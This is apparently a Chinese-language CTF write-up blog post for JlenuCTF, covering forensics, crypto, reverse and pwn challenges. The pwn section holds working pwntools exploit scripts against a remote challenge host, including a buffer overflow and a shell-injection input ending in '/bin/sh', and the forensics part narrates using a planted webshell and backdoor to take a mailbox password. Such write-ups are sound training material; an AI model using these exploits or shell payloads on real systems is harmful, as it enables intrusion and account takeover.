JlenuCTF

反正交完wp了,索性水个博客吧(

HAPPYGAME

SIMPIOT

到手后直接strings一波,啊这

社工一:帮我溯源

我愿称为最强题目,雪宝yyds

👴🏻一开始不知道怎么回事,下载下来www.zip是这样的,莫不是👴🏻被搅屎了,浪费了👴🏻一个半小时看日志文件,然后还真给👴🏻查出个威胁情报ip来

后来👴🏻测了一堆无用功,找了一些日志审计脚本和手写正则的脚本,发现啥都查不到,👴🏻傻了,👴🏻寻思happygame给👴🏻整不happy了,👴🏻很气愤,👴🏻去睡觉了

👴🏻第二天越想越气,👴🏻决定再来做一做,👴🏻重新下载www.zip,👴🏻傻了,竟然是网站源码,****

好了,开始审计,rips给👴🏻扫

扫出来木马了,👴🏻直接连shell,然后hacked by HSYM

社工二:深入调查

审日志,ip到手

社工三:信息收集

访问带黑客的网站,发现扣扣号,找到他的生日了,有hint,博客后台是id+生日

然后就可以进带黑客的后台了

社工四:反击黑客

这个👴🏻没有做出来,但是👴🏻不知道哪里不对,先记录一下8

进了后台,用msf连接shell不就行了

然后找到了这个udf.php,有不会修电脑师傅留下的后门,这不直接拿来用一波

然后尝试查看backup发现disable_function给ban了好多system之类的东西,算了,再看看别的目录

然后发现了这个

芜湖,然后邮箱密码就拿到了,用带黑客的ProtonMail邮箱登进去,发现坚果云2333

发现带黑客的身份证,那按理来说黑客就住在下北泽?但是flag不对

所以👴🏻百度百科查到了下北泽的各种叫法和下北泽在日本的具体位置,都不对,算了,不做了,补作业去了(x

MISC

warm-up

直接在console里调用js代码即可弹出flag

CRYPTO

WHATS HAPPEN?

简单的盲文,找个在线解密的一把梭就好了

Baby_RSA

虽然没有做出来,但是感觉思路没问题,先填个坑,不知道中间哪一步错了

from flag import flag
from gmpy2 import invert,gcd
import sympy
from Crypto.Util.number import bytes_to_long,long_to_bytes
import base64
from Crypto.PublicKey import RSA

def get_random_prime(bits):
return sympy.randprime(2**(bits-1), 2**bits)

def gen_key(bits):
p = get_random_prime(bits)
q = get_random_prime(bits)
r = get_random_prime(bits)
e = get_random_prime(48)
assert gcd(e,phi)==1
d=invert(e,(p-1)*(q-1)*(r-1)//gcd(p-1,(gcd(q-1,r-1))))
return (e,d,p*q*r)

def encrypt(msg,e,n):
cipher=pow(bytes_to_long(flag),e,n)
with open(r"nflag.enc","w") as f:
f.write(hex(cipher)[2:])
f.close()

def export_pubkey(n,e):
pubkey = RSA.construct((n,e))
f = open(r'npubkey.pem','wb')
f.write(pubkey.export_key())
f.close()

e,d,n=gen_key(256)
export_pubkey(n,e)

print("d:",d)
#d:6848345389131232097250291554774004483864247462767351912899751705063009304102012225840379809975695209148626539132005837425458215616241927473070938221119168859672496841054510245128799501775634965114887272776082740599056090759932017
encrypt(flag,7,n)

先给了d,解出来pq,然后加密的时候又把e换成了7

但是解的时候解不出来,不知道哪里错了,orz

import gmpy2

p = 0xcd2e55e25e84bd7e050e4e28e0725f2b02442e2d55fcc8053f53811610b7a8e1d3aa2d3f3e3923d3f5ad20e00fbe532b255768d77d9e07fc23bbc6c039d741d9
q = 0xa170bce7723a072e1cfa7b466916939df85d1b97d29c73d5f3cdd8cf49f8194f
e = 7
c = 0x3773fd7f928a0231c0a26e48678984fc36db84f4d63de0cdb36a3101e6e48e140a21b6a6fae834dfaa2670d36444a5f002d28a5d4a9efb6822af43d4d98f4aa9a18139b76527049d2c4419d7ad4ddd9ef65ec7176842aa9ced2f8b14af7bf731
s = (p - 1) * (q - 1)
d = long(gmpy2.invert(e, s))
n = p * q
print (pow(c, e, d))

pwn

easy_sender

签到题,ret2text

from pwn import *

local = 0

binary = './easysender'
port = 10000

if local == 1:
p = process(binary)
else:
p = remote('118.195.156.186',port)

def dbg():
context.log_level = 'debug'

p.recvuntil('?')
payload = b'a' * 0x14 + p64(0x080491B6)
p.sendline(payload)


p.interactive()

strread

有web内味了,尝试用单引号和分号闭合,payload是试出来的

from pwn import *

local = 0

binary = './white'
port = 10002

if local == 1:
p = process(binary)
else:
p = remote('118.195.156.186',port)

def dbg():
context.log_level = 'debug'

p.recvuntil('Path to follow:')
p.sendline("]'&&/bin/sh;")

p.interactive()

strlenvsread

漏洞点在于strlen读取的长度可以被00截断,但是read的返回值不可以,溢出就完事了嗷

from pwn import *

local = 0

binary = './strlenvsread'
port = 10001

if local == 1:
p = process(binary)

else:
p = remote('118.195.156.186',port)

def dbg():
context.log_level = 'debug'

p.recvuntil('Neo, enter your matrix: ')
p.send(b'a\x00' + b'a' * 100)
p.recvuntil('Make your choice: ')
p.send(p64(0) * 3 + p64(0x21) + p64(1))

p.interactive()

reverse

MEGA-RACE

size_t __fastcall scram(const char *flag)
{
size_t result; // rax
size_t i; // [rsp+10h] [rbp-10h]
size_t v3; // [rsp+18h] [rbp-8h]

v3 = strlen(flag);
for ( i = 0LL; ; ++i )
{
result = i;
if ( i >= v3 )
break;
flag[i] ^= 0x77u;
}
return result;
}

简单的异或,写个脚本简单解密即可

#include <stdio.h>

unsigned char pass[] =
{
0x11, 0x1B, 0x16, 0x10, 0x0C, 0x14, 0x47, 0x19, 0x10, 0x05,
0x43, 0x03, 0x02, 0x1B, 0x43, 0x03, 0x46, 0x47, 0x19, 0x0D,
0x28, 0x0E, 0x47, 0x02, 0x28, 0x16, 0x05, 0x44, 0x28, 0x03,
0x1F, 0x44, 0x28, 0x30, 0x22, 0x2E, 0x56, 0x0A, 0x00
};

int main()
{
for(int i = 0;i < strlen(pass);i++)
{
pass[i] = pass[i] ^ 0x77;
}
puts(pass);
}

easy_py

# while None:
# Happy = [
# 39,
# 109,
# 8,
# 109,
# 51,
# 70,
# 21,
# 65,
# 11,
# 112,
# 22,
# 111,
# 33,
# 82,
# 93,
# 124,
# 23,
# 72,
# 77,
# 125,
# 115,
# 74,
# 27,
# 98,
# 23,
# 87,
# 0,
# 95,
# 18,
# 115,
# 117,
# 42,
# 122,
# 18,
# 18,
# 124,
# 103,
# 88]
# num = 37
# f = input('Please input your flag:')
# if len(f) != 38:
# print('Your input is illegal')
# continue
# flag = list(f)
# j = 0
# for i in flag:
# flag[j] = ord(i)
# j += 1

# t1 = threading.Thread(encode_1, (1,), **('target', 'args'))
# t2 = threading.Thread(encode_2, (2,), **('target', 'args'))
# t1.start()
# time.sleep(0.5)
# t2.start()
# t1.join()
# t2.join()
# if flag == Happy:
# print('Good job!')
# continue
# print('No no no!')

是个多线程,encode函数是简单的异或

简单写个解密脚本

def decode():
flag = [
39,
109,
8,
109,
51,
70,
21,
65,
11,
112,
22,
111,
33,
82,
93,
124,
23,
72,
77,
125,
115,
74,
27,
98,
23,
87,
0,
95,
18,
115,
117,
42,
122,
18,
18,
124,
103,
88]

templist = [0] * 38
for i in range(37, 0, -2):
templist[i] = flag[i] ^ i

for i in range(36, 0, -2):
templist[i] = flag[i] ^ flag[i + 1]

# flag = templist
for i in range(len(flag)):
templist[i] = chr(templist[i])

print("".join(templist))
文章作者: Alex
文章链接: http://example.com/2021/05/23/JlenuCTF/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Alex's blog~